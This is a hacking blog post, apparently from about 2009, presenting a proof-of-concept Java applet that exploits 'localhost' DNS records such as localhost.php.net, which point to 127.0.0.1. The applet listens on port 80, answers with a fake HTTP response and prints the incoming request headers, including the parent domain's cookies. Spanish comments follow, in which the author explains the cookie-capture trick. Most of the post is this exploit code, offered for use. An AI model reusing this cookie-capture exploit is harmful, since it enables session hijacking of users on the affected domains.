[PoC] Problems Invalids DNS Records

Posted on 14:06 by Xianur0

A classic error is that the DNS records are created by default "A" record that points to localhost 127.0.0.1, for example:
localhost.php.net = 127.0.0.1
If we make an HTTP GET query subdomain that the result is redirected to our own computer on port 80, so we can create an exploit that capture the data coming into this port (including cookies)

PoC Applet:

Código:
/*
* PoC Problems Invalids DNS Records.
* Author: Xianur0
* Credits:
* Pandora's Box Team: http://e-r00t.s0me.co.cc
* Infierno Hacker: http://www.infiernohacker.com/
*/
import java.applet.Applet;
import java.io.*;
import java.net.*;

//By Xianur0
//uxmal666@gmail.com

public class PoC extends Applet {
public static void main(String args[])
{
// Message terminator
char EOF = (char)0x00;
try
{
ServerSocket s = new ServerSocket(80);
System.out.println("Server started. Waiting for connections...");
// wait for incoming connections
Socket incoming = s.accept();
BufferedReader data_in = new BufferedReader(new InputStreamReader(incoming.getInputStream()));
PrintWriter data_out = new PrintWriter(incoming.getOutputStream());
// HTTP Response (Fake)
data_out.println("OK - 200\nCache-Control: private, max-age=0\nDate=Sat, 17 Jan 2009 18:15:23 GMT\nExpires: -1\nServer: Xianur0Exploit\nContent-Type=text/html; charset=UTF-8\n\nXianur0 Was Here!\n\n" + EOF);
data_out.flush();

boolean quit = false;

while (!quit)
{
String msg = data_in.readLine();
if (msg == null) quit = true;
System.out.println("HTTP Header: "+msg.trim()+EOF);
data_out.flush();
}
}
catch (Exception e)
{
System.out.println("Can not create socket!");
}
}
}




only need to call the applet which created a socket to listen on port 80 and print data arriving Smiley...


Nota: A los que decían que era imposible este bug simplemente les dire me salio el applet!! xDDDDDD

para que entiendan mas el como funciona:

http://xianur0.blogspot.com/2008/08/xss-otro-nivel.html

aunque supongo que ya es un tema muy simple de entender xDDD

5 comentarios:

seth dijo...

pero si apunta a 127.0.0.1 para que queres capturar datos? eso se puede hacer sin conectarse a ningun lado.. y para leer los datos de otro necesitas poner un servidor web en su maquina, y si podes hacer eso no necesitas usar este applet

Xianur0 dijo...

localhost.php.net = 127.0.0.1
Cookie seteada para el dominio: php.net
entramos a localhost.php.net y se envian las cookies de php.net

entendido? jejejeje

DarkL0rd dijo...

Muy bueno, mis felicitaciones. Gracias por nombrar IH, se ve que lo quieres xD

xodâhâfez

Anónimo dijo...

me conviene aprender java para poder hacer todoas estas cosas que vos haces?

o solamente es un lenguaje para programar juegos?

Xianur0 dijo...

Java no es solo un lenguaje para juegos, de hecho hay varias tools para hacking programadas en java, aunque no es del todo un lenguaje muy usado para programar exploits, pero si es un lenguaje muy util cuando se trata de atacar navegadores (applets), etc...